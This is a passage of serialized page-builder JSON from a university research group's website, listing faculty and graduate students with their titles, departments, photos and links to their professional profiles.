Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1659,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s 